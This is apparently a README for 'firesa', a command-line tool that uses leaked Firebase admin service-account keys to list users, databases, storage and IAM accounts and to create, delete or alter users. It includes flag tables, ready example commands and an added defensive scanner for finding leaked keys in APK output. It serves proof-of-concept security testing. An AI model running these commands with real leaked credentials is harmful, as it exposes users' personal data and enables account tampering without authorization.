Firebase service account exploitation script. Enumerates data across Firebase services using a leaked service account's client_email and private_key. Can be used to create a quick PoC. It does not have all possible API calls implemented but it has enough to show impact.
Service accounts with admin-level roles (e.g. firebase-adminsdk) bypass all Firebase security rules, granting unrestricted access to services such as Auth, Realtime Database, Firestore, Storage.
Have you ever found a firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com and a -----BEGIN PRIVATE KEY----- hardcoded in an APK file but didn't know what to do with it? Or perhaps you've spent way too much time digging through Firebase REST API documentation trying to figure out what parameters and endpoints are required to make valid requests.
This tool lets you immediately show impact when you find these service accounts — enumerate users, create/delete users, list databases, list storage files, and more.
Install:

```bash
uv tool install --force .
```

Usage:

```bash
firesa --service-account EMAIL --private-key KEY [options]
```
--private-key accepts a PEM file path or an inline key string (with \n escapes).
--project-id is extracted from the service account email by default.
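Added example (not part of firesa): a small Python scanner a defender can run over a source tree or decompiled APK output to find the client_email / private_key pairs this tool consumes, handling both real newlines and the `\n`-escaped inline form noted above. The file-extension list and the sample JSON are assumptions made for the example.

```python
"""Scan a source tree or decompiled APK output for leaked Firebase service-account credentials."""
import re
from dataclasses import dataclass
from pathlib import Path

# Service-account email, e.g. firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com
SA_EMAIL_RE = re.compile(r"\b([a-z0-9-]+)@([a-z0-9-]+)\.iam\.gserviceaccount\.com\b")
# PEM block, whether it contains real newlines or JSON-style "\n" escapes
PEM_KEY_RE = re.compile(r"-----BEGIN (?:RSA )?PRIVATE KEY-----.*?-----END (?:RSA )?PRIVATE KEY-----", re.S)
# Text-like files worth scanning in apktool/jadx output (assumed list, extend as needed)
SCAN_EXTS = (".json", ".xml", ".smali", ".java", ".kt", ".js", ".properties", ".txt")

@dataclass
class Finding:
    source: str
    email: str
    project_id: str        # derived from the email, as firesa does by default
    admin_sdk: bool        # firebase-adminsdk-* accounts bypass all security rules
    has_private_key: bool  # a key next to the email makes the account usable

def scan_text(text: str, source: str = "<inline>") -> list[Finding]:
    """Return one Finding per distinct service-account email found in text."""
    has_key = PEM_KEY_RE.search(text) is not None
    findings, seen = [], set()
    for m in SA_EMAIL_RE.finditer(text):
        if m.group(0) in seen:
            continue
        seen.add(m.group(0))
        findings.append(Finding(source, m.group(0), m.group(2),
                                m.group(1).startswith("firebase-adminsdk"), has_key))
    return findings

def scan_tree(root: str) -> list[Finding]:
    """Walk a directory and scan every text-like file in it."""
    results = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_EXTS:
            results.extend(scan_text(path.read_text(errors="ignore"), str(path)))
    return results

def severity(f: Finding) -> str:
    """Email plus key for an adminsdk account means every Firebase service is exposed."""
    if f.has_private_key:
        return "CRITICAL" if f.admin_sdk else "HIGH"
    return "INFO"

# Constructed sample mimicking a service-account JSON embedded as a string literal
SAMPLE = ('{"client_email": "firebase-adminsdk-abc12@demo-project.iam.gserviceaccount.com", '
          '"private_key": "-----BEGIN PRIVATE KEY-----\\nMIIEvQIBADANBg...\\n-----END PRIVATE KEY-----\\n"}')
```

Run `scan_tree("path/to/jadx-output")` and report anything `severity()` rates CRITICAL as a key-rotation incident, not just a code fix.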
| Flag | Description |
|---|---|
| `--list-all` | List data from all services |
| `--list-users` | List Firebase Auth users (default if no command given) |
| `--lookup-user EMAIL` | Look up a single user by email |
| `--list-rtdb` | List RTDB instances and read root keys (tries both URL formats, handles regional redirects) |
| `--list-firestore` | List Firestore databases and root collections |
| `--list-storage` | List files in Storage buckets (tries both .appspot.com and .firebasestorage.app) |
| `--list-iam` | List service accounts in the project |
| Flag | Description |
|---|---|
| `--create-user EMAIL PASSWORD` | Create a new user (optionally combine with `--set-display-name`) |
| `--delete-user UID` | Delete a user by UID |
| `--update-user UID` | Update a user (requires at least one `--set-*` flag) |
| `--set-email` | Set email address |
| `--set-display-name` | Set display name |
| `--set-password` | Set password |
| `--set-phone` | Set phone number |
| `--set-disabled true/false` | Disable or enable account |
| Flag | Description |
|---|---|
| `--check-permissions` | Check IAM permissions without reading or modifying data |
| `--max-users N` | Max users to list (default: 100) |
| `--max-files N` | Max storage files to list (default: 100) |
| `--bucket NAME` | Override storage bucket name |
| `--json` | Output raw JSON |
| `--proxy, -x` | HTTP proxy (e.g. http://127.0.0.1:8080) |
```bash
# List first 100 users
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
  --private-key key.pem

# List everything
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
  --private-key key.pem --list-all

# Check what the service account can do
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
  --private-key key.pem --check-permissions

# Look up a specific user
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
  --private-key key.pem --lookup-user user@example.com

# Create a user
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
  --private-key key.pem --create-user test@example.com password123

# Delete a user
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
  --private-key key.pem --delete-user USER_UID

# Update a user
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
  --private-key key.pem --update-user USER_UID --set-display-name "Test" --set-disabled true

# List storage files as JSON through Burp
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
  --private-key key.pem --list-storage --json -x http://127.0.0.1:8080
```